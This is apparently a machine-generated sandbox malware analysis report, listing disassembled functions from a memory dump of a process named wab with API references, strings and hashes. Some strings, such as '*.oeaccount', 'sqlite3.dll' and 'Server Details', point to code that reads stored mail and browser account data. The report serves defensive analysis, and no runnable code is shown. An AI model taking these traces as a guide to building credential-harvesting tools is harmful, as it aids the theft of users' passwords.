                                                                                                                                                • Instruction Fuzzy Hash: 0741C2B1408394AFEB21CF60CD85AAB77DCAB49304F04493FF588A21D1D6B9DA44CB5A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040C642
                                                                                                                                                • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C686
                                                                                                                                                • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C6A0
                                                                                                                                                • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040C743
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Message$MenuPostSendStringmemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3798638045-0
                                                                                                                                                • Opcode ID: 3a7b9920eb43017b966caaa677d6f3b642cf6e436e0306de547793c3a41d1725
                                                                                                                                                • Instruction ID: caf6f60f32b19a677c26e4d16bf675fa64e013cae5d841084b333b07d52aaaaa
                                                                                                                                                • Opcode Fuzzy Hash: 3a7b9920eb43017b966caaa677d6f3b642cf6e436e0306de547793c3a41d1725
                                                                                                                                                • Instruction Fuzzy Hash: 6C41C131500216EBCB35CF24C8C5A96BBA4BF05321F1447B6E958AB2D2C7B99D91CFD8
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00409B5A: ??2@YAPAXI@Z.MSVCRT ref: 00409B7B
                                                                                                                                                  • Part of subcall function 00409B5A: ??3@YAXPAX@Z.MSVCRT ref: 00409C42
                                                                                                                                                • strlen.MSVCRT ref: 0040B366
                                                                                                                                                • atoi.MSVCRT ref: 0040B374
                                                                                                                                                • _mbsicmp.MSVCRT ref: 0040B3C7
                                                                                                                                                • _mbsicmp.MSVCRT ref: 0040B3DA
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4107816708-0
                                                                                                                                                • Opcode ID: 8fdabe3cb48b7dd5393ce896bc272b4884b8954cc15d75e5f27a23b60337e2cc
                                                                                                                                                • Instruction ID: f56b49caca625ffb6a8305ca332e6707e3f7b6555e2304d22037ac8df505f121
                                                                                                                                                • Opcode Fuzzy Hash: 8fdabe3cb48b7dd5393ce896bc272b4884b8954cc15d75e5f27a23b60337e2cc
                                                                                                                                                • Instruction Fuzzy Hash: CC412A75900204EBDB10DF69C581A9DBBF4FB48308F2185BAEC55AB397D738DA41CB98
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: strlen
                                                                                                                                                • String ID: >$>$>
                                                                                                                                                • API String ID: 39653677-3911187716
                                                                                                                                                • Opcode ID: 3bef562ec1fa0c496d1df37275b1e68b1d7bde60f2b1f93b6d17329dd08051c1
                                                                                                                                                • Instruction ID: c4e2884265c3a68fdd0446f239628287b972743a9c94721f5bed41ec85a51522
                                                                                                                                                • Opcode Fuzzy Hash: 3bef562ec1fa0c496d1df37275b1e68b1d7bde60f2b1f93b6d17329dd08051c1
                                                                                                                                                • Instruction Fuzzy Hash: 2A313A5184D2C49EFB119F6880457EEFFB14F22706F1886DAC0D167383C2AC9B4AD75A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy
                                                                                                                                                • String ID: @
                                                                                                                                                • API String ID: 3510742995-2766056989
                                                                                                                                                • Opcode ID: 06b8a3ec594aaba049a721ed4dda8e3acd4ed37df7d7103eefb9391fa1074ca8
                                                                                                                                                • Instruction ID: c67b832eded58a7fed5fb718e1005b1d96f95c91eedcc3159726feab918c483c
                                                                                                                                                • Opcode Fuzzy Hash: 06b8a3ec594aaba049a721ed4dda8e3acd4ed37df7d7103eefb9391fa1074ca8
                                                                                                                                                • Instruction Fuzzy Hash: DB113BF2900705ABCB248F15CCC095A77A9EB94358B00073FFE06562D1E635DA5986DA
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • strlen.MSVCRT ref: 00407709
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00407729
                                                                                                                                                  • Part of subcall function 00406CCE: malloc.MSVCRT ref: 00406CEA
                                                                                                                                                  • Part of subcall function 00406CCE: memcpy.MSVCRT ref: 00406D02
                                                                                                                                                  • Part of subcall function 00406CCE: ??3@YAXPAX@Z.MSVCRT ref: 00406D0B
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040774C
                                                                                                                                                • memcpy.MSVCRT ref: 0040776C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@$memcpy$mallocstrlen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1171893557-0
                                                                                                                                                • Opcode ID: 362879045fdc860860f3123a44022f3e2572d0f7ada27b379acf8bf4c70500ed
                                                                                                                                                • Instruction ID: 5e9a081d75c64704428ce8041afbbeb9d52fcced2ab343c8e96fa08cc39daf7c
                                                                                                                                                • Opcode Fuzzy Hash: 362879045fdc860860f3123a44022f3e2572d0f7ada27b379acf8bf4c70500ed
                                                                                                                                                • Instruction Fuzzy Hash: E411DF71200600DFD730EF18D981D9AB7F5EF443247108A2EF552A7692C736B919CB54
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@??3@memcpymemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1865533344-0
                                                                                                                                                • Opcode ID: 6af0d80cf1f9a4abb6ff5f9bc8d9616050e1b27e252b80ccf982e962f70df596
                                                                                                                                                • Instruction ID: e24a5276dafad98c161ef6ad34afde8f808320b1c4234a0015a7989cc473ef50
                                                                                                                                                • Opcode Fuzzy Hash: 6af0d80cf1f9a4abb6ff5f9bc8d9616050e1b27e252b80ccf982e962f70df596
                                                                                                                                                • Instruction Fuzzy Hash: 12118C71608601AFD328CF2DC881A27F7E9FFD8300B20892EE59A87395DA35E801CB15
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • SHGetMalloc.SHELL32(?), ref: 00410890
                                                                                                                                                • SHBrowseForFolder.SHELL32(?), ref: 004108C2
                                                                                                                                                • SHGetPathFromIDList.SHELL32(00000000,?), ref: 004108D6
                                                                                                                                                • _mbscpy.MSVCRT ref: 004108E9
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: BrowseFolderFromListMallocPath_mbscpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1479990042-0
                                                                                                                                                • Opcode ID: 3753829cb073f40f4471594610d53b7e9f12ad6488aa9b3d51b15237d3a7a1f5
                                                                                                                                                • Instruction ID: 22dc721301a1029169844026e50c0f3522bcecfb2be71eae7d1720ca74c813ee
                                                                                                                                                • Opcode Fuzzy Hash: 3753829cb073f40f4471594610d53b7e9f12ad6488aa9b3d51b15237d3a7a1f5
                                                                                                                                                • Instruction Fuzzy Hash: D311FAB5900208AFDB00DFA9D8849EEBBFCFB49314B10406AEA05E7201D774DA45CFA4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00408B27: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408BF0
                                                                                                                                                  • Part of subcall function 00408B27: memcpy.MSVCRT ref: 00408C2F
                                                                                                                                                • sprintf.MSVCRT ref: 0040B684
                                                                                                                                                • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B6E7
                                                                                                                                                  • Part of subcall function 00408B27: _mbscpy.MSVCRT ref: 00408BA2
                                                                                                                                                  • Part of subcall function 00408B27: strlen.MSVCRT ref: 00408BC0
                                                                                                                                                • sprintf.MSVCRT ref: 0040B6AE
                                                                                                                                                • _mbscat.MSVCRT ref: 0040B6C1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 203655857-0
                                                                                                                                                • Opcode ID: fd7c26483e5a1075d55b25fd65a92633a23fb1db18fe9454acdb9c540dc78240
                                                                                                                                                • Instruction ID: c6c9d64871d24126578c2fffe8df42e6a01bd33b4583c5a66007e13a3507ac6b
                                                                                                                                                • Opcode Fuzzy Hash: fd7c26483e5a1075d55b25fd65a92633a23fb1db18fe9454acdb9c540dc78240
                                                                                                                                                • Instruction Fuzzy Hash: CA018BB650030467EB21B775CC86FE773ACAB04304F04047BB656F51D3DA79E9848A6D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040AB44
                                                                                                                                                • memset.MSVCRT ref: 0040AB5A
                                                                                                                                                  • Part of subcall function 0040A245: _mbscpy.MSVCRT ref: 0040A24A
                                                                                                                                                  • Part of subcall function 0040A245: _strlwr.MSVCRT ref: 0040A28D
                                                                                                                                                • sprintf.MSVCRT ref: 0040AB84
                                                                                                                                                  • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
                                                                                                                                                  • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                                                                                • String ID: </%s>
                                                                                                                                                • API String ID: 3699762281-259020660
                                                                                                                                                • Opcode ID: aa9275fcc028cffcefa48dde5847177ad6754b943bb00a3c6bf4d2e50bcd3c7a
                                                                                                                                                • Instruction ID: 40662a85ba39df66ab9e9dfe1085b05053bd092a42c83a93ebfe6a452f4dfa53
                                                                                                                                                • Opcode Fuzzy Hash: aa9275fcc028cffcefa48dde5847177ad6754b943bb00a3c6bf4d2e50bcd3c7a
                                                                                                                                                • Instruction Fuzzy Hash: F501F9729001296BE720A659DC45FDA776CAF45304F0400FAB60DF3182DB749E548BA5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                • Opcode ID: 6e69610b48158ddd1cace260c8b8c9f990ff9e3410e7d4f8ed62e5c6a57ef570
                                                                                                                                                • Instruction ID: 50686d444a9e23a331db2cec4592ac0caeb7afc27ca0d185df797a95cebddf31
                                                                                                                                                • Opcode Fuzzy Hash: 6e69610b48158ddd1cace260c8b8c9f990ff9e3410e7d4f8ed62e5c6a57ef570
                                                                                                                                                • Instruction Fuzzy Hash: 70E0E6A170470196BA24ABBFBD55B1723ECAA84B66314092FB508D72B2DF2CD864D52C
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _ultoasprintf
                                                                                                                                                • String ID: %s %s %s
                                                                                                                                                • API String ID: 432394123-3850900253
                                                                                                                                                • Opcode ID: da56d414bae2e0ef01a77ba25b2d24ae14ce975277d8d1cdc00a6dd34e745ad8
                                                                                                                                                • Instruction ID: 4eecb7ebe0e72788cc5a9ba801a24b7f953e3738518a64b6aa949e1543d7b5d3
                                                                                                                                                • Opcode Fuzzy Hash: da56d414bae2e0ef01a77ba25b2d24ae14ce975277d8d1cdc00a6dd34e745ad8
                                                                                                                                                • Instruction Fuzzy Hash: AD41C431804A1987D538D5B4878DBEB62A8A702304F5504BFEC9AB32D1D7FCAE45866E
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00406A9F: CreateFileA.KERNEL32(R7D,80000000,00000001,00000000,00000003,00000000,00000000,0044368E,?,.8D,00443752,?,?,*.oeaccount,.8D,?), ref: 00406AB1
                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,0040EC43,?,00000000,?,?,?,?,?,?), ref: 004086C3
                                                                                                                                                  • Part of subcall function 00407691: ??3@YAXPAX@Z.MSVCRT ref: 00407698
                                                                                                                                                  • Part of subcall function 00407691: ??2@YAPAXI@Z.MSVCRT ref: 004076A6
                                                                                                                                                  • Part of subcall function 004072EF: ReadFile.KERNEL32(00000000,?,004436D1,00000000,00000000,?,?,004436D1,?,00000000), ref: 00407306
                                                                                                                                                • CloseHandle.KERNEL32(?,?), ref: 0040870D
                                                                                                                                                  • Part of subcall function 0040767C: ??3@YAXPAX@Z.MSVCRT ref: 00407683
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$??3@$??2@CloseCreateHandleReadSize
                                                                                                                                                • String ID: C@
                                                                                                                                                • API String ID: 1449862175-3201871010
                                                                                                                                                • Opcode ID: 05e9bc18889996fc1c644d7848b4516204ab87caed7d052ccf358956a64e1b41
                                                                                                                                                • Instruction ID: 7447114fd14c0d02a0ee842544e77a6286768af896f3cc7789f687588c6d710a
                                                                                                                                                • Opcode Fuzzy Hash: 05e9bc18889996fc1c644d7848b4516204ab87caed7d052ccf358956a64e1b41
                                                                                                                                                • Instruction Fuzzy Hash: 88018871C04118AFDB00AF65DC45A8F7FB8DF05364F11C166F855B7191DB349A05CBA5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00409682
                                                                                                                                                • SendMessageA.USER32(5\@,00001019,00000000,?), ref: 004096B0
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSendmemset
                                                                                                                                                • String ID: 5\@
                                                                                                                                                • API String ID: 568519121-3174280609
                                                                                                                                                • Opcode ID: ed9ccc659ae768bed3af4396a7a2ef6749329ac2da06921e4e8f3b6130e41676
                                                                                                                                                • Instruction ID: d98da3e135da4b1536afdd38015dbf476e5e9df788621b23f2aabad48e216af8
                                                                                                                                                • Opcode Fuzzy Hash: ed9ccc659ae768bed3af4396a7a2ef6749329ac2da06921e4e8f3b6130e41676
                                                                                                                                                • Instruction Fuzzy Hash: F901D679810204EBDB209F85C881EBBB7F8FF84745F10482AE840A6291D3359D95CB79
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _mbscpy
                                                                                                                                                • String ID: L$ini
                                                                                                                                                • API String ID: 714388716-4234614086
                                                                                                                                                • Opcode ID: 40617556e3c7fadddb40d0723bbaf5de75b625f9ab2653ee00342fdf7e802ddb
                                                                                                                                                • Instruction ID: f535223de382355a817e33459d0294d4a206ca3c03f6505affaa6c17102478c3
                                                                                                                                                • Opcode Fuzzy Hash: 40617556e3c7fadddb40d0723bbaf5de75b625f9ab2653ee00342fdf7e802ddb
                                                                                                                                                • Instruction Fuzzy Hash: CE01B2B1D10218AFDF40DFA9D845ADEBBF4BB08348F14812AE515E6240EBB895458F99
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • failed memory resize %u to %u bytes, xrefs: 00411074
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _msizerealloc
                                                                                                                                                • String ID: failed memory resize %u to %u bytes
                                                                                                                                                • API String ID: 2713192863-2134078882
                                                                                                                                                • Opcode ID: f373e1ad7fcf1c0b49eed94f59212a9c5cf39ccd3639a4d1fec466c2720d2c36
                                                                                                                                                • Instruction ID: 1811babadabc61a025a406b62bb89d9ddf1cf6d87da65dd644d5d85db6a8a765
                                                                                                                                                • Opcode Fuzzy Hash: f373e1ad7fcf1c0b49eed94f59212a9c5cf39ccd3639a4d1fec466c2720d2c36
                                                                                                                                                • Instruction Fuzzy Hash: 12D0C23290C2207EEA122644BC06A5BBB91DF90370F10C51FF618951A0DA3A8CA0638A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • LoadMenuA.USER32(00000000), ref: 00408DE9
                                                                                                                                                • sprintf.MSVCRT ref: 00408E0C
                                                                                                                                                  • Part of subcall function 00408C8C: GetMenuItemCount.USER32(?), ref: 00408CA2
                                                                                                                                                  • Part of subcall function 00408C8C: memset.MSVCRT ref: 00408CC6
                                                                                                                                                  • Part of subcall function 00408C8C: GetMenuItemInfoA.USER32(?), ref: 00408CFC
                                                                                                                                                  • Part of subcall function 00408C8C: memset.MSVCRT ref: 00408D29
                                                                                                                                                  • Part of subcall function 00408C8C: strchr.MSVCRT ref: 00408D35
                                                                                                                                                  • Part of subcall function 00408C8C: _mbscat.MSVCRT ref: 00408D90
                                                                                                                                                  • Part of subcall function 00408C8C: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 00408DAC
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                                                                                • String ID: menu_%d
                                                                                                                                                • API String ID: 1129539653-2417748251
                                                                                                                                                • Opcode ID: 30b56b049a2eb5bda87ce11c85315f509722c2b72e9c228685a229b9196fe7c0
                                                                                                                                                • Instruction ID: fc9d5e34a24bd2be33db7f468ba420a1802cee0dbde2c18454a4e056650a0418
                                                                                                                                                • Opcode Fuzzy Hash: 30b56b049a2eb5bda87ce11c85315f509722c2b72e9c228685a229b9196fe7c0
                                                                                                                                                • Instruction Fuzzy Hash: 96D0C23064174022FB3023266D0EF4B29595BC3B47F1400AEF400B10D2CBBC400486BE
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00406D34: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409576,00000000,00409494,?,00000000,00000104), ref: 00406D3F
                                                                                                                                                • strrchr.MSVCRT ref: 00409579
                                                                                                                                                • _mbscat.MSVCRT ref: 0040958E
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileModuleName_mbscatstrrchr
                                                                                                                                                • String ID: _lng.ini
                                                                                                                                                • API String ID: 3334749609-1948609170
                                                                                                                                                • Opcode ID: 169f9a88f7015fda69d2ff589ea03c9427a0f81af7901bdb9d43f3987180f798
                                                                                                                                                • Instruction ID: 2d2b68270352c45da0ce721119a0fec427a5e2ae0c2a4fc26ba4743072087242
                                                                                                                                                • Opcode Fuzzy Hash: 169f9a88f7015fda69d2ff589ea03c9427a0f81af7901bdb9d43f3987180f798
                                                                                                                                                • Instruction Fuzzy Hash: 25C080521466A024F1173222AD03B4F05844F5370CF25005BFD01351C3EF9D453141FF
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • _mbscpy.MSVCRT ref: 00406E89
                                                                                                                                                  • Part of subcall function 00406AF3: strlen.MSVCRT ref: 00406AF4
                                                                                                                                                  • Part of subcall function 00406AF3: _mbscat.MSVCRT ref: 00406B0B
                                                                                                                                                • _mbscat.MSVCRT ref: 00406E98
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _mbscat$_mbscpystrlen
                                                                                                                                                • String ID: sqlite3.dll
                                                                                                                                                • API String ID: 1983510840-1155512374
                                                                                                                                                • Opcode ID: 680d605fc7031f1bb097eb1115807af08001ddb79e65e6985d80c366fbe9924b
                                                                                                                                                • Instruction ID: b4f080e30331be102d7f345a143f57ec91a882a22c28ed8e87256c61ce2af050
                                                                                                                                                • Opcode Fuzzy Hash: 680d605fc7031f1bb097eb1115807af08001ddb79e65e6985d80c366fbe9924b
                                                                                                                                                • Instruction Fuzzy Hash: E3C0803240513125BB0177717C028AF7D48DF82394B01046EF58561111DD694D3255EB
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044551F,34@,0000007F,?), ref: 004033BA
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PrivateProfileString
                                                                                                                                                • String ID: 34@$Server Details
                                                                                                                                                • API String ID: 1096422788-1041202369
                                                                                                                                                • Opcode ID: c5e07b1729637358d3cbf99362b971886faaa8c49ae95f38c817c63fe3903b9a
                                                                                                                                                • Instruction ID: 5dc36b059aaaf95d4d37dbe6dd28276a8f332030ee7f3b0879c7395586969e1a
                                                                                                                                                • Opcode Fuzzy Hash: c5e07b1729637358d3cbf99362b971886faaa8c49ae95f38c817c63fe3903b9a
                                                                                                                                                • Instruction Fuzzy Hash: FFC04C36948B01BBDE029F909D05F1EBE62BBA8B01F504519F285210AB82754524EB26
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 438689982-0
                                                                                                                                                • Opcode ID: f2cf12dda973bb4c216f8cbd091c1f622c493a2bbdd48a3f51df23d375ad87cf
                                                                                                                                                • Instruction ID: 1cbfd9147006f86015284e0c7f96a5a033359537089e49602f9f07bbf2bf02d4
                                                                                                                                                • Opcode Fuzzy Hash: f2cf12dda973bb4c216f8cbd091c1f622c493a2bbdd48a3f51df23d375ad87cf
                                                                                                                                                • Instruction Fuzzy Hash: B761DE72604702AFDB20DF65E981A6BB7E4FF44304F44492EFA5982250D738ED54CBDA
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FreeLocalmemcpymemsetstrlen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3110682361-0
                                                                                                                                                • Opcode ID: 248d061ae36dd9180c5fbe6d0462f2886f4330fdc0375cf8b316066c10295751
                                                                                                                                                • Instruction ID: 82d09d3ec766172f421874171fbd662b4eebf604b8883e80537bb62e226e9057
                                                                                                                                                • Opcode Fuzzy Hash: 248d061ae36dd9180c5fbe6d0462f2886f4330fdc0375cf8b316066c10295751
                                                                                                                                                • Instruction Fuzzy Hash: 0631F832D0011D9BDF10DB64CD81BDEBBB8EF55314F1005BAE984B7281DA799E85CB94
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3510742995-0
                                                                                                                                                • Opcode ID: fabc9ae393473dab2d99963d71926c72f988121b711c3d64f0b7c32c5eef3d59
